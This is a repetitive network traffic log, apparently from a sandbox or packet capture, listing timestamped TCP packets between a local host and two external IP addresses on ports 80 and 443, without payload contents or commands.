Jul 26, 2024 18:56:42.827763081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827780962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827795982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827806950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827817917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827828884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827841043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827852011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827862978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827862978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.827883959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827898026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827909946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827922106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827934027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.827955961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.828022003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.851188898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851201057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851212025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851279974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.851500988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851511955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851521969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851538897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.851538897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.851548910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851563931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851567984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.851577044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851603031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.851629019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.851933956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851946115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851958036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851969957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.851978064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.852005005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.852029085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.854073048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.854085922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.854096889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.854108095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.854120016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.854130983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.854139090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.854139090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.854167938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.854192972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.855817080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.855829954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.855842113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.855853081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.855876923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.855901003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.856308937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.856323004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.856334925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.856363058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.856389046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.857166052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.857219934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.873017073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.873198032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.873307943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.873320103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.873373985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.874413013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.874424934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.874437094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.874475956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.874504089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.880542994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.880640984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.890949965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.891038895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.891043901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.891055107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.891087055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.891119003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.891973019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.891987085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.891999006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.892035961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.892069101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.892414093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.892427921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.892438889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.892468929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.892525911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.893224001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.893241882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.893254042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.893266916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.893284082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.893357038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.894120932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.894135952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.894146919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.894181013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.894211054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.894980907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.894994974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.895005941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.895035028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.895065069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.895838022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.895853043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.895863056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.895874977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.895889997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.895921946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.896739006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.896753073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.896764994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.896787882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.896819115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.897543907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.897551060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.897562981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.897598028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.897598028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.898284912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.898298025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.898309946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.898322105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.898334026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.898335934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.898372889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.898374081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.899175882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.899188042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.899199963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.899213076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.899226904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.899265051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.899265051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.900079012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.900091887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.900105000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.900116920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.900129080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.900137901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.900137901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.900172949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.900985956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.900999069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.901011944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.901022911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.901035070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.901073933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.901073933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.901897907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.901911974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.901923895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.901936054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.901952982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.901988029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.901988029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.902823925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.902837038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.902847052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.902858973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.902870893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.902883053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.902889967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.902925968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.902925968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.903748989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.903754950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.903759003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.903763056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.903810978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.904694080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.904707909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.904748917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.904778957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.905117989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.905141115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.905152082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.905165911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.905174017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.905178070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.905208111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.905209064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.905241966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.906039000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.906053066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.906064987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.906076908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.906094074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.906131029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.906824112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.906841040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.906872034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.906909943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.011749029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.011826992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.011969090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.011982918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.012025118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.012025118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.012931108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.012945890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.012957096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.012969017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.012994051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.013029099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.013029099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.013092041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.013103962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.013115883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.013130903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.013142109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.013142109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.013176918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.013176918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.014113903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.014127970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.014138937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.014149904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.014163971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.014202118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.014202118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.015331030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.015343904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.015353918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.015367031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.015377998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.015382051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.015415907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.015449047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.016076088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.016089916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.016100883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.016113043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.016140938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.016172886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.016978025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.016989946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.017002106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.017016888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.017028093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.017031908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.017064095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.017090082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.017931938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.017944098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.017954111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.017966032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.017981052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.018017054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.018017054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.018918037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.018930912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.018944025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.018954039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.018965960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.018965960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.018986940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.019015074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.019577980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.019592047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.019603968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.019614935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.019625902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.019627094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.019651890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.019674063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.020459890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.020474911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.020503998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.020518064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.020529032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.020533085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.020533085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.020543098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.020560980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.020560980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.020591974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.021441936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.021455050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.021467924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.021481037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.021491051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.021497011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.021503925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.021517992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.021543980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.021572113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.022373915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.022387981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.022398949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.022411108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.022423029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.022432089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.022432089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.022434950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.022454977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.022454977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.022490978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.023355007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.023366928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.023377895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.023389101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.023401976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.023416042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.023447037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.024240971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.024255037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.024265051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.024276972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.024287939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.024291992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.024298906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.024315119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.024348021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.024348021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.025582075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.025595903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.025608063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.025644064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.025682926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.025862932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.025876999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.025887012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.025898933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.025909901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:43.025914907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.025944948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.025973082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:43.708460093 CEST	49758	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:43.708518982 CEST	443	49758	5.75.212.60	192.168.2.4
